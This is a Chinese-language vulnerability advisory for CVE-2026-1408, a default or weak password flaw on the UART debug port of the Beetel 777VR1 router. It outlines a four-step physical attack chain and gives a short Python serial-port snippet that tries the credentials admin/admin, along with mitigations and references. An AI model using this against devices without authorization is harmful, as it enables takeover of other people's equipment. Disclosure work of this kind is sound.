IPBUF安全漏洞报告

English

CVE-2026-1408 CVSS 2.0 低危

CVE-2026-1408: Beetel 777VR1路由器UART接口存在弱密码漏洞

披露日期: 2026-01-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1408

漏洞类型

弱密码/默认凭据

CVSS评分

2.0 低危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Beetel 777VR1

漏洞概述

CVE-2026-1408是影响Beetel 777VR1路由器的一个安全漏洞，攻击者可通过物理接触设备并利用UART接口的弱密码进行未授权访问。

技术细节

该漏洞源于UART接口使用默认或弱密码，攻击者需物理接触设备，通过串行连接访问调试接口，进而获取设备控制权。

攻击链分析

STEP 1

步骤1

物理接触设备并识别UART接口位置

STEP 2

步骤2

通过串行连接建立通信

STEP 3

步骤3

使用默认或弱密码尝试登录

STEP 4

步骤4

成功登录后获取设备控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

python
import serial

# 连接到UART接口
ser = serial.Serial('/dev/ttyUSB0', 115200)

# 尝试使用默认凭据登录
username = 'admin'
password = 'admin'

ser.write(f'{username}\n{password}\n'.encode())
response = ser.read(1024)
print(response.decode())

影响范围

Beetel 777VR1 < 01.00.09

防御指南

临时缓解措施

限制物理访问设备，定期更换密码，监控异常访问尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1408
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1408
3 Details https://www.cvedetails.com/cve/CVE-2026-1408/
4 VulDB https://vuldb.com/cve/CVE-2026-1408
5 Link https://gist.github.com/raghav20232023/9c51cbd91f3798b1c10f3f30fb631633
6 Link https://vuldb.com/?ctiid.342797
7 Link https://vuldb.com/?id.342797
8 Link https://vuldb.com/?submit.739384

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表